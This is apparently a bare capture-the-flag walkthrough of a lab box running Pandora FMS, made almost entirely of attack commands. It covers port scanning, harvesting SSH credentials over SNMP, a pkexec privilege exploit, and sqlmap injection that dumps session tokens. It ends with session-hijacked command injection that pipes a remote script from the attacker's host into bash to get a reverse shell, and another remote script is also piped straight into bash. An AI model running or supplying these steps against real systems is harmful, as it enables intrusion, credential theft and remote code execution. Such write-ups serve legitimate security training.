Information Gathering

IP Address	Opening Ports
10.10.11.136	TCP:22,80,161

$ ip='10.10.11.136'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA)
|   256 b1417799469a6c5dd2982fc0329ace03 (ECDSA)
|_  256 e736433ba9478a190158b2bc89f65108 (ED25519)
80/tcp  open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
161/tcp open snmp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SNMP

http://10.10.11.136/

$ snmpwalk -v 1 -c public 10.10.11.136

Username: daniel
Password: HotelBabylon23

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.28 --lport 10000 --rhost 10.10.16.28 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

Lateral movement && Pandora Fms SQLI & RCE

https://github.com/MartinxMax/KTOR/blob/main/ktor.sh

$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all

$ ssh -L 9999:localhost:80 daniel@10.10.11.136

$ sqlmap --url="http://127.0.0.1:9999/pandora_console/include/chart_generator.php?session_id=''" --batch --dbs

$ sqlmap --url="http://127.0.0.1:9999/pandora_console/include/chart_generator.php?session_id=''" --batch -D pandora -T tsessions_php --dump

session：g4e01qdgk36mfdh90hvcc54umq

http://127.0.0.1:9999/pandora_console/include/chart_generator.php?session_id=g4e01qdgk36mfdh90hvcc54umq

$ curl -X POST "http://localhost:9999/pandora_console/ajax.php" \
     -H "Host: localhost:9999" \
     -H "User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0" \
     -H "Accept: application/json, text/javascript, */*; q=0.01" \
     -H "Accept-Language: en-US,en;q=0.5" \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
     -H "X-Requested-With: XMLHttpRequest" \
     -H "Origin: http://localhost:9999" \
     -H "Connection: close" \
     -H "Referer: http://localhost:9999/pandora_console/index.php?sec=eventos&sec2=operation/events/events" \
     -H "Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq" \
     -H "Sec-Fetch-Dest: empty" \
     -H "Sec-Fetch-Mode: cors" \
     -H "Sec-Fetch-Site: same-origin" \
     -d "page=include%2fajax%2fevents&perform_event_response=10000000&target=whoami&response_id=1"

$ curl -X POST "http://localhost:9999/pandora_console/ajax.php" \
     -H "Host: localhost:9999" \
     -H "User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0" \
     -H "Accept: application/json, text/javascript, */*; q=0.01" \
     -H "Accept-Language: en-US,en;q=0.5" \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
     -H "X-Requested-With: XMLHttpRequest" \
     -H "Origin: http://localhost:9999" \
     -H "Connection: close" \
     -H "Referer: http://localhost:9999/pandora_console/index.php?sec=eventos&sec2=operation/events/events" \
     -H "Cookie: PHPSESSID=g4e01qdgk36mfdh90hvcc54umq" \
     -H "Sec-Fetch-Dest: empty" \
     -H "Sec-Fetch-Mode: cors" \
     -H "Sec-Fetch-Site: same-origin" \
     -d "page=include%2fajax%2fevents&perform_event_response=10000000&target=curl+http://10.10.16.28/rev.sh|bash&response_id=1"